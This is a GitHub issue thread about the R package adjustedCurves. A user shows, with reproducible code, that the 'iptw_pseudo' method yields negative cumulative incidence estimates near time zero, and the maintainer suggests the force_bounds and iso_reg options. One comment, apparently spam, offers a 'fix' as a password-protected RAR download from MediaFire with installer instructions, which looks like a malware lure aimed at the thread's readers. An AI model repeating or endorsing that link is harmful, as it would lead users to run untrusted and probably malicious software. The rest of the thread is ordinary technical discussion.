### ISSUE TITLE
Issues negative incidence with `iptw_pseudo` in `adjustedcif`

### ISSUE THREAD

**Issue by asb2111** [RobinDenz1/adjustedCurves#37]
Hello,

First off, I would like to thank you for the tremendous effort put into this amazing package, it has been so nice to have all these functions together in one place so I don't need to keep coding them up myself.

In this example, I fit a cumulative incidence function two ways, first with `method = "iptw"` and then with `method="iptw_pseudo"`.  This is just one of the examples I found in the documentation, but switched to use iptw instead of direct standardization. With regular IPTW the curves look fine, but with pseudo-observations things start to look a bit wonky with a big dip into negative values right away and then a jump back up into the expected range.

Thanks for taking a look!

Best,

Alex

``` r
library(adjustedCurves)

# simulate some data as example
set.seed(42)
sim_dat <- sim_confounded_crisk(n=100)
sim_dat$group <- as.factor(sim_dat$group)

# calculate confounder-adjusted cause-specific CIFs for cause = 1
adjcif_iptw <- adjustedcif(data=sim_dat,
                           variable="group",
                           ev_time="time",
                           event="event",
                           method="iptw",
                           treatment_model=glm(group ~ x1 + x2 + x3 + x4 + x5 + x6, data = sim_dat, family = binomial),
                           weight_method = "ps",
                           conf_int=FALSE,
                           cause=1)
#> Loading required namespace: riskRegression

adjcif_iptw_pseudo <- adjustedcif(data=sim_dat,
                      variable="group",
                      ev_time="time",
                      event="event",
                      method="iptw_pseudo",
                      treatment_model=glm(group ~ x1 + x2 + x3 + x4 + x5 + x6, data = sim_dat, family = binomial),
                      weight_method = "ps",
                      conf_int=FALSE,
                      cause=1)


plot(adjcif_iptw)
```

![](https://i.imgur.com/P9NhWRd.png)

``` r
plot(adjcif_iptw_pseudo)
```

![](https://i.imgur.com/nJy0TW8.png)

<sup>Created on 2024-08-26 with [reprex v2.1.1](https://reprex.tidyverse.org)</sup>

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobinDenz1** [comment]
Thanks for the kind words.

I am aware of this issue, but I am not entirely sure what the cause of it is. My guess is that the estimation of the pseudo-values does not work well at times that are very close to 0 when the sample size is small (the problem does not seem to appear with large sample sizes). You can fix this issue quite easily though, by setting `force_bounds` to `TRUE`. I would also recommend setting `iso_reg` to `TRUE` whenever using methods based on pseudo-values. The effect of these correction methods was also studied in the related simulation study, which showed that they work quite well (introduce no bias).

**Comment by asb2111** [comment]
Once again, thank you for the incredibly quick response! I'll go ahead and use those options to fix the issue.
